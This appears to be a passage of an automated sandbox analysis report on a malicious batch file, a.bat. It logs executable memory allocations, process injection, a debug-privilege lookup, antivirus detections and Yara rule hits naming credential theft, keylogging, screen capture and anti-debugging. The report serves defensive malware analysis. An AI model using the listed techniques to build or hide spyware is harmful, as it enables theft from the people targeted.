NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04acb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04acc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04acd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ace000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04acf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\a.bat

File has been identified by 5 AntiVirus engines on VirusTotal as malicious (5 events)

ESET-NOD32	MSIL/Spy.Agent.AES
GData	Script.Trojan.BatCloak.A
Microsoft	Trojan:Win32/Casdet!rfn
Google	Detected
Ikarus	Trojan.Script.BatCloak

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 4, 2023, 8:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications over P2P network	rule	Network_P2P_Win
description	Communication using DGA	rule	Network_DGA
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Escalate priviledges	rule	Escalate_priviledges
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	File Downloader	rule	Network_Downloader
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications over P2P network	rule	Network_P2P_Win
description	Communication using DGA	rule	Network_DGA
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Escalate priviledges	rule	Escalate_priviledges
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\a.bat

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2172 resumed a thread in remote process 2276
NtResumeThread Aug. 4, 2023, 8:59 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2276	1	0	0

a.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All